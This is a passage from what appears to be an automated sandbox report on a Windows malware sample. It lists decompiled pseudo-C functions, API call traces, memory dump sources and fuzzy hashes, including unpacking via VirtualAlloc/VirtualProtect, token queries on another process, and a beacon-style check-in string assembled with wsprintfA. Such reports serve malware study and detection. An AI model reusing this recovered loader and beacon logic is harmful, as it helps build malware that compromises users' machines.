                                                                                                                                  • GetModuleHandleA.KERNEL32(4E52454B,00000000,?,?,00A326C2,?,00000001,?,?,?,00A31900,?), ref: 00A327EB
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,6F577349), ref: 00A32804
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: Nt
                                                                                                                                  • API String ID: 1646373207-3999644925
                                                                                                                                  • Opcode ID: 347db5c7bb96f7463c550fbc5697d832adbf98cf92c6959a2a4cdad87c80d5d4
                                                                                                                                  • Instruction ID: 3d7858b4b9450a8eb02071abf1d6b594e0afeaeb2fcb98c35d574675c067e653
                                                                                                                                  • Opcode Fuzzy Hash: 347db5c7bb96f7463c550fbc5697d832adbf98cf92c6959a2a4cdad87c80d5d4
                                                                                                                                  • Instruction Fuzzy Hash: 10F0F97190230AEFDB19CBE9FD44BAA73ECEB19355B104059F801E7264E774EA02CB94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A32291(CHAR* _a4) {
                                                                                                                                  				long _t9;
                                                                                                                                  				CHAR* _t10;
                                                                                                                                  
                                                                                                                                  				_t10 = 0;
                                                                                                                                  				_t9 = ExpandEnvironmentStringsA(_a4, 0, 0);
                                                                                                                                  				if(_t9 != 0) {
                                                                                                                                  					_t10 = E00A375F6(_t9);
                                                                                                                                  					if(_t10 != 0 && ExpandEnvironmentStringsA(_a4, _t10, _t9) == 0) {
                                                                                                                                  						E00A34AAB(_t10);
                                                                                                                                  						_t10 = 0;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t10;
                                                                                                                                  			}





                                                                                                                                  APIs
                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,00A31083,73797325), ref: 00A322A2
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00A322BC
                                                                                                                                    • Part of subcall function 00A34AAB: RtlFreeHeap.NTDLL(00000000,00000000,00A35012,00000000,?,?,00000000), ref: 00A34AB7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnvironmentExpandHeapStrings$AllocateFree
                                                                                                                                  • String ID: PGt
                                                                                                                                  • API String ID: 1564683301-293773470
                                                                                                                                  • Opcode ID: 438584540ce25ad539d31e482b0afaaa7caf9e26bccdb9eca85d28197a8726b9
                                                                                                                                  • Instruction ID: 588a3d6c25eb345f18ad2b9849979e8cbf9b36b4a933007c82f6f0f685a50b58
                                                                                                                                  • Opcode Fuzzy Hash: 438584540ce25ad539d31e482b0afaaa7caf9e26bccdb9eca85d28197a8726b9
                                                                                                                                  • Instruction Fuzzy Hash: 92E0BF326026326646325AEA5D44E9BDEADEFEAAF1B060125F909E2121DA11CC1293F5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                  			E00A31EC1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                                                                                                  				intOrPtr* _v8;
                                                                                                                                  				void* _t17;
                                                                                                                                  				intOrPtr* _t22;
                                                                                                                                  				void* _t27;
                                                                                                                                  				char* _t30;
                                                                                                                                  				void* _t33;
                                                                                                                                  				void* _t34;
                                                                                                                                  				void* _t36;
                                                                                                                                  				void* _t37;
                                                                                                                                  				void* _t39;
                                                                                                                                  				int _t42;
                                                                                                                                  
                                                                                                                                  				_t17 = __eax;
                                                                                                                                  				_t37 = 0;
                                                                                                                                  				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                                                                                                  				_t2 = _t17 + 1; // 0x1
                                                                                                                                  				_t28 = _t2;
                                                                                                                                  				_t34 = E00A375F6(_t2);
                                                                                                                                  				if(_t34 != 0) {
                                                                                                                                  					_t30 = E00A375F6(_t28);
                                                                                                                                  					if(_t30 == 0) {
                                                                                                                                  						E00A34AAB(_t34);
                                                                                                                                  					} else {
                                                                                                                                  						_t39 = _a4;
                                                                                                                                  						_t22 = E00A3A971(_t39);
                                                                                                                                  						_v8 = _t22;
                                                                                                                                  						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                                                                                                  							_a4 = _t39;
                                                                                                                                  						} else {
                                                                                                                                  							_t26 = _t22 + 2;
                                                                                                                                  							_a4 = _t22 + 2;
                                                                                                                                  							_t22 = E00A3A971(_t26);
                                                                                                                                  							_v8 = _t22;
                                                                                                                                  						}
                                                                                                                                  						if(_t22 == 0) {
                                                                                                                                  							__imp__(_t34, _a4);
                                                                                                                                  							 *_t30 = 0x2f;
                                                                                                                                  							 *((char*)(_t30 + 1)) = 0;
                                                                                                                                  						} else {
                                                                                                                                  							_t42 = _t22 - _a4;
                                                                                                                                  							memcpy(_t34, _a4, _t42);
                                                                                                                                  							 *((char*)(_t34 + _t42)) = 0;
                                                                                                                                  							__imp__(_t30, _v8);
                                                                                                                                  						}
                                                                                                                                  						 *_a8 = _t34;
                                                                                                                                  						_t37 = 1;
                                                                                                                                  						 *_a12 = _t30;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t37;
                                                                                                                                  			}















                                                                                                                                  APIs
                                                                                                                                  • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00A35405,00000000,00000000,74E481D0,033A9618,?,?,00A32A8A,?,033A9618), ref: 00A31ECD
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                    • Part of subcall function 00A3A971: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00A31EFB,00000000,00000001,00000001,?,?,00A35405,00000000,00000000,74E481D0,033A9618), ref: 00A3A97F
                                                                                                                                    • Part of subcall function 00A3A971: StrChrA.SHLWAPI(?,0000003F,?,?,00A35405,00000000,00000000,74E481D0,033A9618,?,?,00A32A8A,?,033A9618,0000EA60,?), ref: 00A3A989
                                                                                                                                  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00A35405,00000000,00000000,74E481D0,033A9618,?,?,00A32A8A), ref: 00A31F2B
                                                                                                                                  • lstrcpy.KERNEL32(00000000,74E481D0), ref: 00A31F3B
                                                                                                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00A31F47
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3767559652-0
                                                                                                                                  • Opcode ID: b0961fa2471316622304040599a6f219b52b7d26d81b828aa4595eab5c1a95d3
                                                                                                                                  • Instruction ID: 2c0dc8cc1b5631f5743dc56761755068adb0903d695ad02b3c393f77f136bfbf
                                                                                                                                  • Opcode Fuzzy Hash: b0961fa2471316622304040599a6f219b52b7d26d81b828aa4595eab5c1a95d3
                                                                                                                                  • Instruction Fuzzy Hash: 8B21B172508295EFCB129FB8CD44BAE7FB8EF06390F158056F904AB212D731C9018BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3131E(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				void* _t18;
                                                                                                                                  				int _t25;
                                                                                                                                  				int _t29;
                                                                                                                                  				int _t34;
                                                                                                                                  
                                                                                                                                  				_t29 = lstrlenW(_a4);
                                                                                                                                  				_t25 = lstrlenW(_a8);
                                                                                                                                  				_t18 = E00A375F6(_t25 + _t29 + _t25 + _t29 + 2);
                                                                                                                                  				_v8 = _t18;
                                                                                                                                  				if(_t18 != 0) {
                                                                                                                                  					_t34 = _t29 + _t29;
                                                                                                                                  					memcpy(_t18, _a4, _t34);
                                                                                                                                  					_t10 = _t25 + 2; // 0x2
                                                                                                                                  					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                                                                                                  				}
                                                                                                                                  				return _v8;
                                                                                                                                  			}









                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,033A9364,?,00A350AD,004F0053,033A9364,?,?,?,?,?,?,00A354EF), ref: 00A3132E
                                                                                                                                  • lstrlenW.KERNEL32(00A350AD,?,00A350AD,004F0053,033A9364,?,?,?,?,?,?,00A354EF), ref: 00A31335
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,00A350AD,004F0053,033A9364,?,?,?,?,?,?,00A354EF), ref: 00A31355
                                                                                                                                  • memcpy.NTDLL(74E069A0,00A350AD,00000002,00000000,004F0053,74E069A0,?,?,00A350AD,004F0053,033A9364), ref: 00A31368
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2411391700-0
                                                                                                                                  • Opcode ID: 0f323d121559af59ea0052a349beb4621b6da2fd72389692f13769d67c7a303b
                                                                                                                                  • Instruction ID: 70ee1cefa0cdeeba9c9835588cac17e160405e51a2247d8dc8fd591a9dfb6fff
                                                                                                                                  • Opcode Fuzzy Hash: 0f323d121559af59ea0052a349beb4621b6da2fd72389692f13769d67c7a303b
                                                                                                                                  • Instruction Fuzzy Hash: 48F0E776900119BBCB11EBA9CD85C9F7BACEF49394B154462FD04D7212E631EA149BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • lstrlen.KERNEL32(033A9B10,00000000,00000000,7691C740,00A3467E,00000000), ref: 00A338DA
                                                                                                                                  • lstrlen.KERNEL32(?), ref: 00A338E2
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • lstrcpy.KERNEL32(00000000,033A9B10), ref: 00A338F6
                                                                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 00A33901
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 74227042-0
                                                                                                                                  • Opcode ID: 0ac38efdc2f57596b39763df1db9d97ea1418d18a4e324c8f04027da1f7c1180
                                                                                                                                  • Instruction ID: 00e6bda94c7ecacb81930b427208f50a84a3ec24a422c3368af447e09ec69f2c
                                                                                                                                  • Opcode Fuzzy Hash: 0ac38efdc2f57596b39763df1db9d97ea1418d18a4e324c8f04027da1f7c1180
                                                                                                                                  • Instruction Fuzzy Hash: 4FE09273501260E7C711DBE8AD48C5FFBACEF8A7617040416F600E3111C720C9028BA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Executed Functions

                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,000008C9,00003000,00000040,000008C9,6E97DA28), ref: 6E97E097
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000128,00003000,00000040,6E97DA88), ref: 6E97E0CE
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00016396,00003000,00000040), ref: 6E97E12E
                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E97E164
                                                                                                                                  • VirtualProtect.KERNEL32(6E8D0000,00000000,00000004,6E97DFB9), ref: 6E97E269
                                                                                                                                  • VirtualProtect.KERNEL32(6E8D0000,00001000,00000004,6E97DFB9), ref: 6E97E290
                                                                                                                                  • VirtualProtect.KERNEL32(00000000,?,00000002,6E97DFB9), ref: 6E97E35D
                                                                                                                                  • VirtualProtect.KERNEL32(00000000,?,00000002,6E97DFB9,?), ref: 6E97E3B3
                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E97E3CF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.684052741.000000006E97D000.00000040.00020000.sdmp, Offset: 6E97D000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2574235972-0
                                                                                                                                  • Opcode ID: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                                                  • Instruction ID: 1532731c19047ecb8d8048b55b1c182ca6af44890a261f2af2e2ca0a8a368f86
                                                                                                                                  • Opcode Fuzzy Hash: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                                                  • Instruction Fuzzy Hash: 4FD17C725206219FDB22CF54CC80A9237E7FF49B91F0841A8ED4A9F34AD370AA05CF64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 38%
                                                                                                                                  			E031A5D10(char _a4, void* _a8) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				char _v16;
                                                                                                                                  				void* _v20;
                                                                                                                                  				char _v24;
                                                                                                                                  				char _v28;
                                                                                                                                  				char _v32;
                                                                                                                                  				char _v36;
                                                                                                                                  				char _v40;
                                                                                                                                  				void* _v44;
                                                                                                                                  				void** _t33;
                                                                                                                                  				void* _t40;
                                                                                                                                  				void* _t43;
                                                                                                                                  				void** _t44;
                                                                                                                                  				intOrPtr* _t47;
                                                                                                                                  				char _t48;
                                                                                                                                  
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				_v20 = _a4;
                                                                                                                                  				_t48 = 0;
                                                                                                                                  				_v16 = 0;
                                                                                                                                  				_a4 = 0;
                                                                                                                                  				_v44 = 0x18;
                                                                                                                                  				_v40 = 0;
                                                                                                                                  				_v32 = 0;
                                                                                                                                  				_v36 = 0;
                                                                                                                                  				_v28 = 0;
                                                                                                                                  				_v24 = 0;
                                                                                                                                  				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                                                                                                  					_t33 =  &_v8;
                                                                                                                                  					__imp__(_v12, 8, _t33);
                                                                                                                                  					if(_t33 >= 0) {
                                                                                                                                  						_t47 = __imp__;
                                                                                                                                  						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                                                                                                  						_t44 = E031A75F6(_a4);
                                                                                                                                  						if(_t44 != 0) {
                                                                                                                                  							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                                                                                                  							if(_t40 >= 0) {
                                                                                                                                  								memcpy(_a8,  *_t44, 0x1c);
                                                                                                                                  								_t48 = 1;
                                                                                                                                  							}
                                                                                                                                  							E031A4AAB(_t44);
                                                                                                                                  						}
                                                                                                                                  						NtClose(_v8); // executed
                                                                                                                                  					}
                                                                                                                                  					NtClose(_v12);
                                                                                                                                  				}
                                                                                                                                  				return _t48;
                                                                                                                                  			}


                                                                                                                                  APIs
                                                                                                                                  • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 031A5D57
                                                                                                                                  • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 031A5D6A
                                                                                                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 031A5D86
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 031A5DA3
                                                                                                                                  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 031A5DB0
                                                                                                                                  • NtClose.NTDLL(?), ref: 031A5DC2
                                                                                                                                  • NtClose.NTDLL(00000000), ref: 031A5DCC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2575439697-0
                                                                                                                                  • Opcode ID: 49dacff5c32c12afe571e09f73e91ce53b8a1504d686203820d4604c33ca95da
                                                                                                                                  • Instruction ID: f1139219ee630f8d82bd91133350643e09feae025f4bdcd5df15a67124c595f9
                                                                                                                                  • Opcode Fuzzy Hash: 49dacff5c32c12afe571e09f73e91ce53b8a1504d686203820d4604c33ca95da
                                                                                                                                  • Instruction Fuzzy Hash: 3B21F6BAA00618BBDB01EF99CC459DEBFBAEB0C751F104026F901E6110D7719A559BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,000008BB), ref: 6E8E5696
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,6E97B7A0,000008BB), ref: 6E8E576F
                                                                                                                                    • Part of subcall function 6E8E72B0: task.LIBCPMTD ref: 6E8E7352
                                                                                                                                    • Part of subcall function 6E8EBA20: swap.LIBCPMTD ref: 6E8EBA39
                                                                                                                                  • CreateSemaphoreW.KERNEL32(00000000,00000007,00000007,00000000,6E967144,?,?,?,?,?,00000000), ref: 6E8E5950
                                                                                                                                  • std::locale::locale.LIBCPMTD ref: 6E8E59D8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName$CreateSemaphorestd::locale::localeswaptask
                                                                                                                                  • String ID: ?
                                                                                                                                  • API String ID: 756721536-1684325040
                                                                                                                                  • Opcode ID: 4523ba4582d832fb38a7824027b2ac74240894e4a52113d9145a3a0acb66f331
                                                                                                                                  • Instruction ID: 4548c44c63027359671f4cf293aaa57d58b060eb914cd35c51bf336499526202
                                                                                                                                  • Opcode Fuzzy Hash: 4523ba4582d832fb38a7824027b2ac74240894e4a52113d9145a3a0acb66f331
                                                                                                                                  • Instruction Fuzzy Hash: 7F524EF0A08624CFCF08CFA9D990AA977B6FF8B305F108929D54597794D7B8984DCB44
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 66%
                                                                                                                                  			E031A44A4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
                                                                                                                                  				intOrPtr _v0;
                                                                                                                                  				intOrPtr _v4;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				intOrPtr _v24;
                                                                                                                                  				intOrPtr _v28;
                                                                                                                                  				void* _v44;
                                                                                                                                  				intOrPtr _v52;
                                                                                                                                  				void* __edi;
                                                                                                                                  				long _t25;
                                                                                                                                  				intOrPtr _t26;
                                                                                                                                  				intOrPtr _t27;
                                                                                                                                  				intOrPtr _t28;
                                                                                                                                  				intOrPtr _t29;
                                                                                                                                  				intOrPtr _t30;
                                                                                                                                  				void* _t33;
                                                                                                                                  				intOrPtr _t34;
                                                                                                                                  				int _t37;
                                                                                                                                  				void* _t38;
                                                                                                                                  				intOrPtr _t42;
                                                                                                                                  				intOrPtr _t43;
                                                                                                                                  				void* _t46;
                                                                                                                                  				intOrPtr _t50;
                                                                                                                                  				intOrPtr _t54;
                                                                                                                                  				intOrPtr* _t56;
                                                                                                                                  				intOrPtr _t62;
                                                                                                                                  				intOrPtr _t68;
                                                                                                                                  				intOrPtr _t71;
                                                                                                                                  				intOrPtr _t74;
                                                                                                                                  				int _t77;
                                                                                                                                  				intOrPtr _t78;
                                                                                                                                  				int _t81;
                                                                                                                                  				intOrPtr _t83;
                                                                                                                                  				int _t86;
                                                                                                                                  				intOrPtr* _t89;
                                                                                                                                  				intOrPtr* _t90;
                                                                                                                                  				void* _t91;
                                                                                                                                  				void* _t95;
                                                                                                                                  				void* _t96;
                                                                                                                                  				void* _t97;
                                                                                                                                  				intOrPtr _t98;
                                                                                                                                  				void* _t100;
                                                                                                                                  				int _t101;
                                                                                                                                  				void* _t102;
                                                                                                                                  				void* _t103;
                                                                                                                                  				void* _t105;
                                                                                                                                  				void* _t106;
                                                                                                                                  				void* _t108;
                                                                                                                                  
                                                                                                                                  				_t95 = __edx;
                                                                                                                                  				_t91 = __ecx;
                                                                                                                                  				_t25 = __eax;
                                                                                                                                  				_t105 = _a16;
                                                                                                                                  				_v4 = 8;
                                                                                                                                  				if(__eax == 0) {
                                                                                                                                  					_t25 = GetTickCount();
                                                                                                                                  				}
                                                                                                                                  				_t26 =  *0x31ad018; // 0x53709a90
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t27 =  *0x31ad014; // 0x3a87c8cd
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t28 =  *0x31ad010; // 0xd8d2f808
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t29 =  *0x31ad00c; // 0xeec43f25
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t30 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  				_t3 = _t30 + 0x31ae633; // 0x74666f73
                                                                                                                                  				_t101 = wsprintfA(_t105, _t3, 2, 0x3f874, _t29, _t28, _t27, _t26,  *0x31ad02c,  *0x31ad004, _t25);
                                                                                                                                  				_t33 = E031A5B60();
                                                                                                                                  				_t34 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  				_t4 = _t34 + 0x31ae673; // 0x74707526
                                                                                                                                  				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                                                                                                  				_t108 = _t106 + 0x38;
                                                                                                                                  				_t102 = _t101 + _t37; // executed
                                                                                                                                  				_t38 = E031A1BBF(_t91); // executed
                                                                                                                                  				_t96 = _t38;
                                                                                                                                  				if(_t96 != 0) {
                                                                                                                                  					_t83 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  					_t6 = _t83 + 0x31ae8cc; // 0x736e6426
                                                                                                                                  					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                                                                                                  					_t108 = _t108 + 0xc;
                                                                                                                                  					_t102 = _t102 + _t86;
                                                                                                                                  					HeapFree( *0x31ad270, 0, _t96);
                                                                                                                                  				}
                                                                                                                                  				_t97 = E031A137A();
                                                                                                                                  				if(_t97 != 0) {
                                                                                                                                  					_t78 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  					_t8 = _t78 + 0x31ae8d4; // 0x6f687726
                                                                                                                                  					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                                                                                                  					_t108 = _t108 + 0xc;
                                                                                                                                  					_t102 = _t102 + _t81;
                                                                                                                                  					HeapFree( *0x31ad270, 0, _t97);
                                                                                                                                  				}
                                                                                                                                  				_t98 =  *0x31ad364; // 0x5bd95b0
                                                                                                                                  				_a32 = E031A3857(0x31ad00a, _t98 + 4);
                                                                                                                                  				_t42 =  *0x31ad308; // 0x0
                                                                                                                                  				if(_t42 != 0) {
                                                                                                                                  					_t74 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  					_t11 = _t74 + 0x31ae8ae; // 0x3d736f26
                                                                                                                                  					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                                                                                                  					_t108 = _t108 + 0xc;
                                                                                                                                  					_t102 = _t102 + _t77;
                                                                                                                                  				}
                                                                                                                                  				_t43 =  *0x31ad304; // 0x0
                                                                                                                                  				if(_t43 != 0) {
                                                                                                                                  					_t71 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  					_t13 = _t71 + 0x31ae885; // 0x3d706926
                                                                                                                                  					wsprintfA(_t102 + _t105, _t13, _t43);
                                                                                                                                  				}
                                                                                                                                  				if(_a32 != 0) {
                                                                                                                                  					_t46 = RtlAllocateHeap( *0x31ad270, 0, 0x800); // executed
                                                                                                                                  					_t100 = _t46;
                                                                                                                                  					if(_t100 != 0) {
                                                                                                                                  						E031AA811(GetTickCount());
                                                                                                                                  						_t50 =  *0x31ad364; // 0x5bd95b0
                                                                                                                                  						__imp__(_t50 + 0x40);
                                                                                                                                  						asm("lock xadd [eax], ecx");
                                                                                                                                  						_t54 =  *0x31ad364; // 0x5bd95b0
                                                                                                                                  						__imp__(_t54 + 0x40);
                                                                                                                                  						_t56 =  *0x31ad364; // 0x5bd95b0
                                                                                                                                  						_t103 = E031A1974(1, _t95, _t105,  *_t56);
                                                                                                                                  						asm("lock xadd [eax], ecx");
                                                                                                                                  						if(_t103 != 0) {
                                                                                                                                  							StrTrimA(_t103, 0x31ac2ac);
                                                                                                                                  							_push(_t103);
                                                                                                                                  							_t62 = E031A38CA();
                                                                                                                                  							_v16 = _t62;
                                                                                                                                  							if(_t62 != 0) {
                                                                                                                                  								_t89 = __imp__;
                                                                                                                                  								 *_t89(_t103, _v0);
                                                                                                                                  								 *_t89(_t100, _a4);
                                                                                                                                  								_t90 = __imp__;
                                                                                                                                  								 *_t90(_t100, _v28);
                                                                                                                                  								 *_t90(_t100, _t103);
                                                                                                                                  								_t68 = E031A2A4E(0xffffffffffffffff, _t100, _v28, _v24); // executed
                                                                                                                                  								_v52 = _t68;
                                                                                                                                  								if(_t68 != 0 && _t68 != 0x10d2) {
                                                                                                                                  									E031A47D5();
                                                                                                                                  								}
                                                                                                                                  								HeapFree( *0x31ad270, 0, _v44);
                                                                                                                                  							}
                                                                                                                                  							HeapFree( *0x31ad270, 0, _t103);
                                                                                                                                  						}
                                                                                                                                  						RtlFreeHeap( *0x31ad270, 0, _t100); // executed
                                                                                                                                  					}
                                                                                                                                  					HeapFree( *0x31ad270, 0, _a24);
                                                                                                                                  				}
                                                                                                                                  				RtlFreeHeap( *0x31ad270, 0, _t105); // executed
                                                                                                                                  				return _a4;
                                                                                                                                  			}


                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 031A44BB
                                                                                                                                  • wsprintfA.USER32 ref: 031A4508
                                                                                                                                  • wsprintfA.USER32 ref: 031A4525
                                                                                                                                  • wsprintfA.USER32 ref: 031A4548
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 031A4558
                                                                                                                                  • wsprintfA.USER32 ref: 031A457A
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 031A458A
